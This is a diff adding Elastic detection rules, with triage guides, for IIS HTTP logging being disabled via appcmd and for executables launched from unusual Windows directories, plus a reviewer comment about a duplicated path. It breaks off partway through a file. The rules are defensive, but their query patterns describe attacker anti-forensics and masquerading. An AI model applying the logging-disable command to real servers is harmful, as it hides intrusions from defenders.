+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: 
Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.002",
+ "name": "Disable Windows Event Logging",
+ "reference": "https://attack.mitre.org/techniques/T1562/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json
new file mode 100644
index 00000000000..7c2e7168880
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json
@@ -0,0 +1,110 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.process-*",
+ "logs-windows.*",
+ "endgame-*",
+ "logs-system.security*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "max_signals": 33,
+ "name": "IIS HTTP Logging Disabled",
+ "note": "## Triage and analysis\n\n### Investigating IIS HTTP Logging Disabled\n\nIIS (Internet Information Services) is a Microsoft web server software used to host websites and web applications on Windows. It provides features for serving dynamic and static content, and can be managed through a graphical interface or command-line tools.\n\nIIS logging is a data source that can be used for security monitoring, forensics, and incident response. It contains mainly information related to requests done to the web server, and can be used to spot malicious activities like webshells. Adversaries can tamper, clear, and delete this data to evade detection, cover their tracks, and slow down incident response.\n\nThis rule monitors commands that disable IIS logging.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Verify whether the logs stored in the `C:\\inetpub\\logs\\logfiles\\w3svc1` directory were deleted after this action.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "system",
+ "version": "^1.6.4"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5",
+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: 
Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.002",
+ "name": "Disable Windows Event Logging",
+ "reference": "https://attack.mitre.org/techniques/T1562/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 110
+ },
+ "id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json
new file mode 100644
index 00000000000..a7c10e8b189
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json
@@ -0,0 +1,94 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*",
+ "logs-system.security*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Process Execution from an Unusual Directory",
+ "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT 
description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified 
during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", 
\"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n 
\"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f",
+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1036",
+ "name": "Masquerading",
+ "reference": "https://attack.mitre.org/techniques/T1036/",
+ "subtechnique": [
+ {
+ "id": "T1036.005",
+ "name": "Match 
Legitimate Name or Location",
+ "reference": "https://attack.mitre.org/techniques/T1036/005/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json
new file mode 100644
index 00000000000..0fd0a5d89f3
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_110.json
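Review bot: The `process.executable` path list in `query` of this rule (ebfe1448-…_109) contains `\"?:\\\\Windows\\\\security\\\\*.exe\"` twice, once on the third row of the list and again in the row with `TextInput` and `schemas`, so one entry is dead and the list is harder to audit for coverage; drop the second occurrence. The same duplicate is present in the _110 copy of this rule that follows, so both files should change together. The `process.name` exclusion list and the explicit `process.executable` exclusions below it do not repeat any entry, so only this allow-list is affected. These rule JSONs look like mirrored exports of an upstream rule source, so the fix presumably belongs there as well as in this package.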
@@ -0,0 +1,94 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.process-*",
+ "logs-windows.*",
+ "endgame-*",
+ "logs-system.security*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Process Execution from an Unusual Directory",
+ "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT 
description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified 
during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", 
\"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n 
\"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f",
+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
